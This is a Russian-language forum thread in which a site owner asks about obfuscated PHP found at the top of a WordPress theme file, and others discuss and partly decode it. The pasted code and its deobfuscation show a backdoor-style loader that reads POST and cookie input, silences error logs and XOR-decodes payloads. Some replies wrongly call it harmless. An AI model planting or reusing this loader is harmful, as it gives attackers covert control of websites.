Страный код в начали файла Wordpress?

Question

[matros97]

Доброе утро, подскажите что это за страный код в начали файла это вирус

<?php $qff9a = 471;$GLOBALS['i6e2c']=Array();global$i6e2c;$i6e2c=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['s43e04b']="\x79\x41\x68\x47\x71\x37\x43\x73\x2b\x9\x5e\x38\x33\x3a\x3d\x60\x7e\x4e\x21\x75\x6c\x4c\x7b\x45\x2d\x4a\x59\x44\x35\x78\x3f\x25\x30\x70\x4b\x6b\x5f\x6f\x5a\x52\x29\x61\x55\x63\x28\x6e\x34\x7d\x4f\x26\x4d\x49\x7a\x2c\x6d\x3b\x40\x57\x53\x42\x39\x51\x3e\x48\x50\x77\x2a\x36\x7c\x20\x24\x74\x72\xa\x62\x56\x27\xd\x5d\x3c\x2f\x64\x58\x22\x67\x66\x23\x5c\x5b\x46\x6a\x54\x31\x69\x65\x76\x32\x2e";$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96]]=$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][2].$i6e2c['s43e04b'][72];$i6e2c[$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][46]]=$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][81];$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][60]]=$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][45];$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][94]]=$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][45].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][71];$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][81]]=$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][52].$i6e2c['s43e04b'][94];$i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74]]=$i6e2c['s43e04b'][33].$i6e2c['s43e04b'][2].$i6e2c['s43e04b'][33].$i6e2c['s43e04b'][95].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][45];$i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][41]]=$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][45].$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][52].$i6e2c['s43e04b'][94];$i6e2c[$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][43]]=$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][94];$i6e2c[$i6e2c['s43e04b'][0].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][41]]=$i6e2c['s43e04b'][7].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][54].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][54].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][71];$i6e2c[$i6e2c['s43e04b'][90].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][5]]=$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][46];$i6e2c[$i6e2c['s43e04b'][4].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][81]]=$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][28];$i6e2c[$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][5]]=$_POST;$i6e2c[$i6e2c['s43e04b'][90].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][12]]=$_COOKIE;@$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][94]]($i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][20].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][84],NULL);@$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][94]]($i6e2c['s43e04b'][20].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][84].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][7],0);@$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][94]]($i6e2c['s43e04b'][54].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][37].$i6e2c['s43e04b'][45].$i6e2c['s43e04b'][36].$i6e2c['s43e04b'][71].$i6e2c['s43e04b'][93].$i6e2c['s43e04b'][54].$i6e2c['s43e04b'][94],0);@$i6e2c[$i6e2c['s43e04b'][0].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][41]](0);$e271c71=NULL;$qfe70a=NULL;$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][85].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][5]]=$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][12].$i6e2c['s43e04b'][41].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][28].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][24].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][94].$i6e2c['s43e04b'][11].$i6e2c['s43e04b'][81].$i6e2c['s43e04b'][46].$i6e2c['s43e04b'][74].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][67].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][92];global$u6f1c2e47;function b939eb25($e271c71,$o094c62){global$i6e2c;$x2d81e="";for($e29dc95a=0;$e29dc95a<$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][60]]($e271c71);){for($b49c=0;$b49c<$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][60]]($o094c62)&&$e29dc95a<$i6e2c[$i6e2c['s43e04b'][19].$i6e2c['s43e04b'][60].$i6e2c['s43e04b'][43].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][60]]($e271c71);$b49c++,$e29dc95a++){$x2d81e.=$i6e2c[$i6e2c['s43e04b'][72].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][96]]($i6e2c[$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][46]]($e271c71[$e29dc95a])^$i6e2c[$i6e2c['s43e04b'][29].$i6e2c['s43e04b'][96].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][5].$i6e2c['s43e04b'][32].$i6e2c['s43e04b'][92].$i6e2c['s43e04b'][46]]($o094c62[$b49c]));}}return$x2d81e;}function } ?><?php wp_nav_menu( array(
'theme_location' => 'sidebar-menu',
>

Answer 1

[Евгений Вольф]

подскажите что это за страный код в начали файла это вирус

Судя по всему - да. Можете попробовать скачать весь сайт (код сайта) себе на компьютер и проверить его антивирусами Dr.Web и Kaspersky, оба они в той или иной мере способны находить (и иногда даже лечить) в т.ч. и такие вирусы. По крайней мере, Вы узнаете наверняка, вирус ли это...

P.S. И у Kaspersky и у Dr.Web были бесплатные утилиты для проверки без необходимости установки самого антивируса себе на ПК. Так же если архив с сайтом не очень большой (если очень - можно удалить оттуда картинки, загрузки и прочее) можно попробовать загрузить на VirusTotal, и тогда вообще ничего ставить не придётся.

Comments

[Сергей delphinpro]

Судя по всему - да.

=D
Это однозначно вирус

[Сергей delphinpro]

Автор, вы бы взяли и посмотрели этот файл в репозитории вордпресса и убедились бы, что там нет такого кода.

[Евгений Вольф]

Сергей: Я практически не работаю с CMS, но когда мне приходилось с ними сталкиваться, "Каспер" ругался на корпоративную версию "Битрикс", что там вирус или что-то на него крайне похожее, т.к. часть системы зашифрована (в OpenSource CMS, внезапно). Именно исходя из подобных соображений (в том смысле, что подобный зашифрованный код мог оказаться в системе по целому ряду причин) я не рискнул делать поспешных выводов :)

Хотя, уверен, что Вы правы. С другой стороны, описанная мной практика поможет автору вопроса в будущем находить решения и ответы самостоятельно :D

[Сергей delphinpro]

Евгений Вольф: Битрикс опенсорсный? Неожиданно. Это же коммерческая система. Ядро понятно зашифровано.

[Евгений Вольф]

Сергей: не могу "по быстрому" найти оригинал, но вообще они писали, что система "OpenSource". Зашифровано по моему не само ядро, а какие-то его части, т.к. мне попадались шифрованные файлы только в более "дорогих" редакциях системы (и соотв. не встречалась в "дешевых").

[Сергей delphinpro]

Евгений Вольф: ну может быть какая-то часть и официально объявлена открытой.. не буду спорить, я стараюсь по возможности держаться подальше от этой системы. иногда только приходится вляпываться...

[Евгений Вольф]

Сергей: я стараюсь вообще подальше держаться от CMS, а от этой системы настолько далеко, насколько это вообще возможно, но, в виду должности - вольно-невольно работать с ней приходится :D

Answer 2

[Сергей Сосновский]

Никакой это не вирус! php обфускатор

Comments

[Site Developer]

А что по твоему обфусцировано, если не вирь или шелл? )
В ВП нет и не может быть подобного говна.

Answer 3

[Юрий]

раскодировал ваш код, получается примерно следующее.
правда при вставке часть кода у вас видимо потерялась в конце в районе "return$x2d81e;}function } ?>" тут явная ошибка.
из-за этого непонятно с какими параметрами запускается функция.

но судя по всему функция проверяет валидность ключа $u6f1c2e47 = "0ab51c57-be71-493a-8c58-7ce8d4b71671";

скорее всего указанный код просто проверяет что скрипт запускает хозяин, который передаст нужные параметры через ($_POST или $_COOKIE).
но что примечательно в коде нет ни eval ни include ни даже чего нибудь для сохранения.

могу предположить что это автор скрипта (модуля или темы) хочет в дальнейшем проверять кто купил этот скрипт (или кто его слил).

но код здесь не весь, поэтому возможно не прав.

<?php 

$qff9a = 471;
$GLOBALS['i6e2c'] = Array();

$r202 = "chr";
$x217014 = "ord";
$u9c19 = "strlen";
$r038e = "ini_set";
$r1fd = "serialize";
$d02ff21eb = "phpversion";
$d54fea = "unserialize";
$f549e33c = "base64_decode";
$y8bab83aa = "set_time_limit";
$j01867 = "e7024";
$qcf3eb3d = "b939eb25";
$d8d47 = $_POST;
$j5c03c5f3 = $_COOKIE;
ini_set("error_log", NULL);
ini_set("log_errors", 0);
ini_set("max_execution_time", 0);
set_time_limit(0);
$e271c71 = NULL;
$qfe70a = NULL;
$u6f1c2e47 = "0ab51c57-be71-493a-8c58-7ce8d4b71671";

function b939eb25($param1, $param2)
{
    $result = "";
    for ($i = 0; $i < strlen($param1);) {
        for ($j = 0; $j < strlen($param2) && $i < strlen($param1); $j++, $i++) {
            $result .= chr(ord($param1[$i]) ^ ord($param2[$j]));
        }
    }
    return $result;
}